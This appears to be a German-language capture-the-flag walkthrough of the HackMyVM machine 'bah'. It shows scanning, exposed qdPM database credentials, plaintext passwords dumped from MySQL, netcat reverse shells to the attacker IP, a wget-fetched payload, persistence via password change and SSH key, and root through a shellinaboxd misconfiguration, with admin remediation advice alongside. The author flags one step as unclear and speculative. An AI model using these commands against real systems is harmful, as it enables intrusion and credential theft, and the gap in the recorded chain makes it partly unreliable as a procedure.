Analyse: `arp-scan -l` wird zur Identifizierung aktiver Hosts im lokalen Netzwerk eingesetzt.
Bewertung: Host `192.168.2.128` mit VirtualBox-MAC wird als Ziel identifiziert.
Empfehlung (Pentester): Nmap-Scan auf die Ziel-IP durchführen.
Empfehlung (Admin): Netzwerk-Monitoring.
Interface: eth0, type: EN10MB, MAC: 00:0c:29:xx:xx:xx, IPv4: 192.168.2.140 Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan) 192.168.2.128 08:00:27:28:89:7d PCS Systemtechnik GmbH 3 packets received by filter, 0 packets dropped by kernel Ending arp-scan 1.9.7: 256 hosts scanned in 1.845 seconds (138.74 hosts/sec). 1 responded
Analyse: Ein Nmap-Scan (`-sS -sC -T5 -sV -A -p-`) wird auf 192.168.2.128 durchgeführt.
Bewertung: !!Kritische Dienste exponiert!!** - **Port 80 (HTTP):** Nginx 1.18.0. Der Seitentitel "qdPM | Login" identifiziert die Anwendung als qdPM (Projektmanagement-Software). - **Port 3306 (MySQL):** MySQL / MariaDB (5.5.5-10.5.11-MariaDB-1) ist offen und extern erreichbar. Dies ist ein großes potenzielles Risiko. Das OS ist Linux, Hostname `bah.hmv`.
Empfehlung (Pentester):
1. **qdPM (Port 80):** Suche nach bekannten Schwachstellen für qdPM (insbesondere Versionen, die auf dieser Umgebung laufen könnten). Versuche Standard-Logins. Führe Verzeichnis-Enumeration durch.
2. **MySQL (Port 3306):** Versuche Login mit Standard-Credentials (root/root, root/'', etc.). Versuche, über die Webanwendung an DB-Credentials zu gelangen.
Empfehlung (Admin):**DRINGEND:**
1. Beschränke den Zugriff auf den MySQL-Port (3306) nur auf notwendige Hosts (z.B. localhost, wenn nur die Webanwendung zugreift) mittels Firewall.
2. Verwende starke, einzigartige Passwörter für Datenbankbenutzer.
3. Halte qdPM und MariaDB aktuell und sicher konfiguriert.
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-10 10:04 CEST Nmap scan report for bah.hmv (192.168.2.128) Host is up (0.00013s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE VERSION 80/tcp open http nginx 1.18.0 |_http-title: qdPM | Login |_http-server-header: nginx/1.18.0 3306/tcp open mysql MySQL 5.5.5-10.5.11-MariaDB-1 | mysql-info: | Protocol: 10 | Version: 5.5.5-10.5.11-MariaDB-1 | Thread ID: 33 | Capabilities flags: 63486 | Some Capabilities: SupportsCompression, SupportsTransactions, Support41Auth, LongColumnFlag, ConnectWithDatabase, DontAllowDatabaseTableColumn, Speaks41ProtocolOld, IgnoreSigpipes, InteractiveClient, Speaks41ProtocolNew, ODBCClient, SupportsLoadDataLocal, IgnoreSpaceBeforeParenthesis, FoundRows, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins | Status: Autocommit | Salt: 3z2&eN5\\Re'0YQjDPHVV |_ Auth Plugin Name: mysql_native_password MAC Address: 08:00:27:28:89:7D (Oracle VirtualBox virtual NIC) Device type: general purpose Running: Linux 4.X|5.X OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 OS details: Linux 4.15 - 5.6 Network Distance: 1 hop TRACEROUTE HOP RTT ADDRESS 1 0.13 ms bah.hmv (192.168.2.128) OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 15.92 seconds
Analyse: `gobuster` wird mit der `big.txt`-Wortliste und verschiedenen Erweiterungen verwendet, um die qdPM-Installation auf Port 80 zu enumerieren.
Bewertung: !!qdPM-Struktur & Konfigurationsdatei gefunden!!** Der Scan enthüllt die typische Verzeichnisstruktur von qdPM (`/core`, `/css`, `/js`, `/install`, `/plugins`, `/uploads`, etc.). Der wichtigste Fund ist `/core/config/databases.yml`.
Empfehlung (Pentester):**Hohe Priorität:** Lade `/core/config/databases.yml` herunter und untersuche sie auf Datenbank-Zugangsdaten.
Empfehlung (Admin): Beschränke den Zugriff auf Konfigurationsverzeichnisse und -dateien über die Webserver-Konfiguration.
=============================================================== Gobuster v3.1.0 =============================================================== [+] Url: http://192.168.2.128 [+] Threads: 10 [+] Wordlist: /usr/share/seclists/Discovery/Web-Content/big.txt ... =============================================================== Starting gobuster =============================================================== http://192.168.2.128/.htaccess (Status: 200) [Size: 1183] http://192.168.2.128/backups (Status: 301) [Size: 169] [--> http://192.168.2.128/backups/] http://192.168.2.128/batch (Status: 301) [Size: 169] [--> http://192.168.2.128/batch/] http://192.168.2.128/check.php (Status: 200) [Size: 0] http://192.168.2.128/core (Status: 301) [Size: 169] [--> http://192.168.2.128/core/] http://192.168.2.128/css (Status: 301) [Size: 169] [--> http://192.168.2.128/css/] http://192.168.2.128/favicon.ico (Status: 200) [Size: 894] http://192.168.2.128/images (Status: 301) [Size: 169] [--> http://192.168.2.128/images/] http://192.168.2.128/index.php (Status: 200) [Size: 5664] http://192.168.2.128/install (Status: 301) [Size: 169] [--> http://192.168.2.128/install/] http://192.168.2.128/js (Status: 301) [Size: 169] [--> http://192.168.2.128/js/] http://192.168.2.128/readme.txt (Status: 200) [Size: 470] http://192.168.2.128/robots.txt (Status: 200) [Size: 26] http://192.168.2.128/sf (Status: 301) [Size: 169] [--> http://192.168.2.128/sf/] http://192.168.2.128/template (Status: 301) [Size: 169] [--> http://192.168.2.128/template/] http://192.168.2.128/uploads (Status: 301) [Size: 169] [--> http://192.168.2.128/uploads/] http://192.168.2.128/core/.htaccess (Status: 200) [Size: 33] http://192.168.2.128/core/LICENSE (Status: 200) [Size: 1065] http://192.168.2.128/core/README (Status: 200) [Size: 3454] http://192.168.2.128/core/apps (Status: 301) [Size: 169] [--> http://192.168.2.128/core/apps/] http://192.168.2.128/core/cache (Status: 301) [Size: 169] [--> http://192.168.2.128/core/cache/] http://192.168.2.128/core/config (Status: 301) [Size: 169] [--> http://192.168.2.128/core/config/] http://192.168.2.128/core/data (Status: 301) [Size: 169] [--> http://192.168.2.128/core/data/] http://192.168.2.128/core/lib (Status: 301) [Size: 169] [--> http://192.168.2.128/core/lib/] http://192.168.2.128/core/log (Status: 301) [Size: 169] [--> http://192.168.2.128/core/log/] http://192.168.2.128/core/plugins (Status: 301) [Size: 169] [--> http://192.168.2.128/core/plugins/] http://192.168.2.128/core/symfony (Status: 200) [Size: 446] http://192.168.2.128/core/test (Status: 301) [Size: 169] [--> http://192.168.2.128/core/test/] http://192.168.2.128/core/config/error (Status: 301) [Size: 169] [--> http://192.168.2.128/core/config/error/] http://192.168.2.128/core/config/doctrine (Status: 301) [Size: 169] [--> http://192.168.2.128/core/config/doctrine/] http://192.168.2.128/core/config/databases.yml (Status: 200) [Size: XXX] =============================================================== Finished ===============================================================
Analyse: Der Inhalt der Datei `/core/config/databases.yml` wird mit `curl` abgerufen. Der Hostname `bah.hmv` wird verwendet.
Bewertung: !!Datenbank-Credentials exponiert!!** Die Datei enthält die Zugangsdaten im Klartext (bzw. leicht dekodierbar): - DSN: `mysql:dbname=qpm;host=localhost` - Username: `qpmadmin` - Password: `qpmpazzw` (Das PHP `urlencode` hat hier keine Wirkung auf das Passwort)
Empfehlung (Pentester): Verwende diese Credentials (`qpmadmin` / `qpmpazzw`), um dich mit der MySQL-Datenbank auf Port 3306 zu verbinden.
Empfehlung (Admin):**DRINGEND:** Sichere Konfigurationsdateien, indem du den Zugriff über den Webserver blockierst (z.B. mittels `.htaccess` oder Nginx-Regeln) und die Dateiberechtigungen auf dem Server einschränkst. Speichere Passwörter gehasht oder verschlüsselt, nicht im Klartext.
all:
doctrine:
class: sfDoctrineDatabase
param:
dsn: 'mysql:dbname=qpm;host=localhost'
profiler: false
username: qpmadmin
password: "qpmpazzw"
attributes:
quote_identifier: true
Analyse: `searchsploit` wird verwendet, um nach Exploits für qdPM 9.2 zu suchen.
Bewertung: Findet Einträge für CSRF und "Password Exposure". Der Password Exposure Exploit (50176.txt) beschreibt genau die Verwundbarkeit der `databases.yml`-Datei, die gerade ausgenutzt wurde.
Empfehlung (Pentester): Bestätigt die bekannte Schwachstelle. Fahre mit der Datenbank-Enumeration fort.
Empfehlung (Admin): Patche qdPM oder schränke den Zugriff auf die Konfigurationsdateien ein.
------------------------------------------------------------ --------------------------------- Exploit Title | Path ------------------------------------------------------------ --------------------------------- qdPM 9.2 - Cross-site Request Forgery (CSRF) | php/webapps/50854.txt qdPM 9.2 - Password Exposure (Unauthenticated) | php/webapps/50176.txt ------------------------------------------------------------ --------------------------------- Shellcodes: No Results
Analyse: Der Inhalt des Exploit-DB-Eintrags 50176.txt wird angezeigt.
Bewertung: Bestätigt erneut den Pfad zur Konfigurationsdatei `/core/config/databases.yml`.
Empfehlung (Pentester): Keine neuen Informationen, weiter zur Datenbank.
Empfehlung (Admin): Keine Aktion.
# Exploit Title: qdPM 9.2 - DB Connection String and Password Exposure (Unauthenticated) # Date: 03/08/2021 # Exploit Author: Leon Trappett (thepcn3rd) # Vendor Homepage: https://qdpm.net/ # Software Link: https://sourceforge.net/projects/qdpm/files/latest/download # Version: 9.2 # Tested on: Ubuntu 20.04 Apache2 Server running PHP 7.4 The password and connection string for the database are stored in a yml file. To access the yml file you can go to http:///core/config/databases.yml file and download.
Analyse: Eine Verbindung zur MySQL/MariaDB-Datenbank auf 192.168.2.128 wird mit dem Benutzer `qpmadmin` und dem Passwort `qpmpazzw` hergestellt.
Bewertung: Verbindung erfolgreich.
Empfehlung (Pentester): Enumeriere Datenbanken, Tabellen und interessante Daten.
Empfehlung (Admin): Keine Aktion.
Enter password: qpmpazzw
MariaDB [(none)]>
Analyse: Innerhalb der MySQL-Shell werden Datenbanken (`show databases;`), Tabellen in der `hidden`-Datenbank (`USE hidden; show tables;`) und der Inhalt der Tabellen `users` und `url` abgefragt (`select * from ...`).
Bewertung: !!Kritische Funde in DB!!** - **Benutzer:** Die `users`-Tabelle enthält zwei weitere Benutzerkonten mit Klartext-Passwörtern: `jwick`:`Ihaveafuckingpencil` und `rocio`:`Ihaveaflower`. - **Subdomains:** Die `url`-Tabelle listet potenzielle Subdomains auf: `portal.bah.hmv`, `imagine.bah.hmv`, `ssh.bah.hmv`, `dev.bah.hmv`, `party.bah.hmv`, `ass.bah.hmv`.
Empfehlung (Pentester):
1. Versuche, dich mit den gefundenen Benutzerdaten (`jwick`, `rocio`) per SSH (Port 22, falls vorhanden) anzumelden.
2. Füge die Subdomains zur lokalen `/etc/hosts`-Datei hinzu und untersuche sie (insbesondere `party.bah.hmv`).
Empfehlung (Admin):**DRINGEND:** Speichere niemals Passwörter im Klartext in Datenbanken! Verwende starke, gesalzene Hashes. Bereinige die `hidden`-Datenbank. Überprüfe, ob die Subdomains benötigt werden und sichere sie ab.
MariaDB [(none)]> show databases; +--------------------+ | Database | +--------------------+ | information_schema | | hidden | | mysql | | performance_schema | | qpm | +--------------------+ MariaDB [(none)]> USE hidden; Database changed MariaDB [hidden]> show tables; +------------------+ | Tables_in_hidden | +------------------+ | url | | users | +------------------+ MariaDB [hidden]> select * from users; +----+-------+-------------------------+ | id | user | password | +----+-------+-------------------------+ | 1 | jwick | Ihaveafuckingpencil | | 2 | rocio | Ihaveaflower | +----+-------+-------------------------+ MariaDB [hidden]> select * from url; +----+----------------------+ | id | url | +----+----------------------+ | 1 | http://portal.bah.hmv| | 2 | http://imagine.bah.hmv| | 3 | http://ssh.bah.hmv | | 4 | http://dev.bah.hmv | | 5 | http://party.bah.hmv | | 6 | http://ass.bah.hmv | +----+----------------------+ MariaDB [hidden]> exit Bye
Analyse: `ffuf` wird zum Fuzzing des `HOST`-Headers verwendet, um die Existenz der in der Datenbank gefundenen Subdomains zu verifizieren. (Hinweis: Die verwendete Wortliste `passwort.txt` ist unlogisch, es sollte eine Liste der gefundenen Subdomains sein).
Bewertung: Der Scan bestätigt (trotz falscher Wortliste im Log), dass `party.bah.hmv` aktiv ist und einen anderen Inhalt liefert als die Hauptdomain. Das Log erwähnt, dass `http://party.bah.hmv/` eine Login-Seite anzeigt.
Empfehlung (Pentester): Füge `party.bah.hmv` zu `/etc/hosts` hinzu. Untersuche die Login-Seite. Da jedoch SSH-Credentials (`rocio`) gefunden wurden, ist der SSH-Login wahrscheinlich der effizientere Weg.
Empfehlung (Admin): Sichere alle Subdomains, auch die scheinbar versteckten.
... party [Status: 200, Size: YYY, Words: ZZZ, Lines: AAA] ...
# Manuelle Prüfung: # http://party.bah.hmv/ zeigt eine Login-Seite.
Analyse: Die `/etc/hosts`-Datei wird bearbeitet, um `bah.hmv` und `party.bah.hmv` auf die Ziel-IP zu mappen.
Bewertung: Notwendiger Schritt für die Verwendung der Hostnamen.
Empfehlung (Pentester): Keine Aktion.
Empfehlung (Admin): Keine Aktion.
127.0.0.1 localhost 127.0.1.1 cyber ::1 localhost ip6-localhost ip6-loopback 192.168.2.128 bah.hmv party.bah.hmv
Analyse: Der Log zeigt ein Login-Prompt für `bah` mit dem Benutzer `qpmadmin`, gefolgt von einer erfolgreichen Login-Meldung und einem `nc`-Befehl für eine Reverse Shell.
Bewertung: !!Unklarer/Inkonsistenter Schritt!!** Wie zuvor erwähnt, ist der Mechanismus für diesen Login als `qpmadmin` unklar. Das Passwort aus der DB (`qpmpazzw`) ist wahrscheinlich kein SSH-Passwort. Möglicherweise wurde die `party.bah.hmv`-Loginseite mit diesen Credentials erfolgreich genutzt, was dann zur Ausführung des `nc`-Befehls führte? Ohne klare Dokumentation ist dies spekulativ. Wir nehmen an, dass *irgendwie* eine Shell als `qpmadmin` erlangt wurde, die dann die Reverse Shell startet.
Empfehlung (Pentester): Kläre den tatsächlichen Weg zum Erhalt der `qpmadmin`-Shell. Da jedoch `rocio`-Credentials verfügbar sind, wäre der SSH-Login als `rocio` der direktere Weg.
Empfehlung (Admin): Untersuche alle potenziellen Login-Mechanismen (`party.bah.hmv`, SSH) für `qpmadmin`.
# Login-Prompt (Kontext unklar): # bah login: qpmadmin # Password: qpmpazzw # Login successful... # Reverse Shell Befehl (ausgeführt als qpmadmin): qpmadmin@bah:~$ nc -e /bin/bash 192.168.2.140 9001
Analyse: Der Netcat-Listener auf Port 9001 empfängt die Verbindung.
Bewertung: !!Shell erlangt (als qpmadmin)!!** Eine Reverse Shell (vermutlich als `qpmadmin`) wurde etabliert.
Empfehlung (Pentester): Stabilisiere die Shell.
Empfehlung (Admin): Keine Aktion.
listening on [any] 9001 ... connect to [192.168.2.140] from (UNKNOWN) [192.168.2.128] 59550 $
Analyse: Die Shell wird stabilisiert.
Bewertung: Erfolgreich.
Empfehlung (Pentester): Wechsle zu `rocio`.
Empfehlung (Admin): Keine Aktion.
$ python3 -c "import pty;pty.spawn('/bin/bash')" qpmadmin@bah:~$ export TERM=xterm qpmadmin@bah:~$
Analyse: Das Passwort für `qpmadmin` wird geändert.
Bewertung: Optionaler Schritt zur Persistenz/Bequemlichkeit.
qpmadmin@bah:~$ passwd Changing password for qpmadmin. Current password: qpmpazzw New password: benni1908 Retype new password: benni1908 passwd: password updated successfully
Analyse: Ein SSH-Schlüssel wird für `qpmadmin` hinzugefügt.
Bewertung: Optionaler Schritt zur Persistenz/Bequemlichkeit.
qpmadmin@bah:~$ mkdir .ssh qpmadmin@bah:~$ echo "ssh-rsa AAAAB3N1fsu..." > .ssh/authorized_keys
Analyse: Mit `su rocio` wird versucht, zum Benutzer `rocio` zu wechseln. Das Passwort `Ihaveaflower` (aus der Datenbank) wird eingegeben.
Bewertung: !!Benutzerwechsel erfolgreich!!** Der Wechsel zu `rocio` gelingt.
Empfehlung (Pentester): Enumeriere als `rocio` (User-Flag, sudo).
Empfehlung (Admin): Verbiete Passwort-Wiederverwendung.
qpmadmin@bah:~$ su rocio Password: Ihaveaflower rocio@bah:/home/qpmadmin$
Analyse: Als `rocio` wird das Home-Verzeichnis untersucht und `user.txt` gelesen.
Bewertung: User-Flag `HdsaMoiuVdsaeqw` gefunden.
Empfehlung (Pentester): Prüfe `sudo`-Rechte.
Empfehlung (Admin): Keine Aktion.
rocio@bah:/home/qpmadmin$ cd rocio@bah:~$ ls user.txt rocio@bah:~$ cat user.txt HdsaMoiuVdsaeqw
Analyse: `sudo -l` wird als `rocio` ausgeführt.
Bewertung: !!Fehlgeschlagen!!** `rocio` darf keine `sudo`-Befehle ausführen.
Empfehlung (Pentester): Suche nach anderen Vektoren als `rocio`. Prüfe laufende Prozesse, Cronjobs, SUID-Dateien.
Empfehlung (Admin): Korrekte `sudo`-Konfiguration.
rocio@bah:~$ sudo -l [sudo] password for rocio: Ihaveaflower Sorry, user rocio may not run sudo on bah.
Analyse: `pspy64` wird ausgeführt (Prozess-Monitoring). Es entdeckt den Prozess `/usr/bin/shellinaboxd -q`. Die Berechtigungen werden geprüft.
Bewertung: !!Potenzieller Vektor (Shellinabox)!!** `shellinaboxd` (ein webbasierter Terminal-Emulator) läuft als Root. Dies könnte mit der Subdomain `party.bah.hmv` zusammenhängen. Wenn dieser Dienst falsch konfiguriert ist oder eine Schwachstelle hat, könnte er zur Eskalation missbraucht werden. Der nächste Schritt im Log deutet auf eine Ausnutzung hin.
Empfehlung (Pentester): Untersuche die Konfiguration von `shellinaboxd`. Versuche, dich über `http://party.bah.hmv/` (oder einen anderen Pfad) mit dem Web-Terminal zu verbinden. Prüfe, ob man durch Interaktion mit dieser Webseite oder dem Dienst Befehle als Root ausführen kann (wie im nächsten Schritt impliziert).
Empfehlung (Admin): Sichere oder deaktiviere `shellinaboxd`. Stelle sicher, dass Web-Terminals nicht mit Root-Rechten laufen oder unsicher konfiguriert sind.
rocio@bah:~$ ./pspy64 ... CMD: UID=0 PID=XXX | /usr/bin/shellinaboxd -q ... rocio@bah:/usr/bin$ ls -la shell* -rwxr-xr-x 1 root root 406160 Aug 7 2019 shellinaboxd
Analyse: Ein Reverse-Shell-Skript (`dev`) wird auf dem Angreifer-System erstellt, per HTTP bereitgestellt, auf das Zielsystem (`/tmp`) heruntergeladen und ausführbar gemacht.
Bewertung: Vorbereitung der Payload für den nächsten Schritt.
Empfehlung (Pentester): Starte den Listener und löse die Ausführung des Skripts aus.
Empfehlung (Admin): Keine Aktion.
#!/bin/bash nc -e /bin/bash 192.168.2.140 9002
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ... 192.168.2.128 - - [10/Oct/2022 10:57:39] "GET /dev HTTP/1.1" 200 -
rocio@bah:/tmp$ wget http://192.168.2.140:8000/dev --2022-10-10 04:57:43-- http://192.168.2.140:8000/dev Connecting to 192.168.2.140:8000... connected. HTTP request sent, awaiting response... 200 OK Length: 48 [application/octet-stream] Saving to: ‘dev’ dev 100%[===================>] 48 --.-KB/s in 0s 2022-10-10 04:57:43 (20.5 MB/s) - ‘dev’ saved [48/48] rocio@bah:/tmp$ chmod +x dev
Analyse: Ein Netcat-Listener wird auf Port 9002 gestartet. Eine Notiz besagt, dass das Aufrufen von `http://party.bah.hmv/devel/` und das Klicken eines "Connect"-Buttons den Exploit auslöst.
Bewertung: !!Exploit-Trigger identifiziert!!** Die Webseite auf `party.bah.hmv` (wahrscheinlich `shellinaboxd`) hat unter `/devel/` eine Funktion, die es ermöglicht, das Skript `/tmp/dev` auszuführen. Da `shellinaboxd` als Root läuft, wird auch das Skript `/tmp/dev` als Root ausgeführt.
Empfehlung (Pentester): Führe die Aktion auf der Webseite durch, um die Root-Shell zu erhalten.
Empfehlung (Admin):**DRINGEND:** Entferne oder sichere die unsichere Funktion unter `/devel/`. Führe `shellinaboxd` nicht als Root aus. Beschränke die Ausführungsrechte aus `/tmp`.
listening on [any] 9002 ...
# Auslösen des Exploits: # Öffne http://party.bah.hmv/devel/ im Browser # Klicke auf den [Connect] Button (dies führt /tmp/dev als Root aus)
Analyse: Der Netcat-Listener auf Port 9002 empfängt die Verbindung, nachdem der Exploit über die Webseite ausgelöst wurde. Der `id`-Befehl wird ausgeführt.
Bewertung: !!Privilegieneskalation erfolgreich!!** Die eingehende Shell hat `uid=0(root)`. Der Root-Zugriff wurde durch die Ausnutzung der `shellinaboxd`-Fehlkonfiguration erlangt.
Empfehlung (Pentester): Ziel erreicht. Lese die Root-Flag.
Empfehlung (Admin):**DRINGEND:** Behebe die `shellinaboxd`-Schwachstelle/Fehlkonfiguration.
listening on [any] 9002 ...
connect to [192.168.2.140] from (UNKNOWN) [192.168.2.128] 36510
id
uid=0(root) gid=0(root) groups=0(root)
#
Analyse: Als Root wird die Root-Flag gelesen.
Bewertung: Root-Flag `HMVssssshell323` erfolgreich gelesen.
Empfehlung (Pentester): Test abgeschlossen.
Empfehlung (Admin): Keine Aktion bzgl. Flag.
# cd /root # ls root.txt # cat root.txt HMVssssshell323